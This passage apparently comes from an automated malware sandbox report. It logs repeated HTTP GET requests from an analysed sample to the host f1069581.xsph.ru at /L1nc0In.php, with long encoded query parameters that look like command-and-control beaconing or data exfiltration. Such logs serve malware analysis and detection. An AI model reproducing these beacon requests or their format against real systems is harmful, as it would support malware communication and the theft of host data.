UdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5U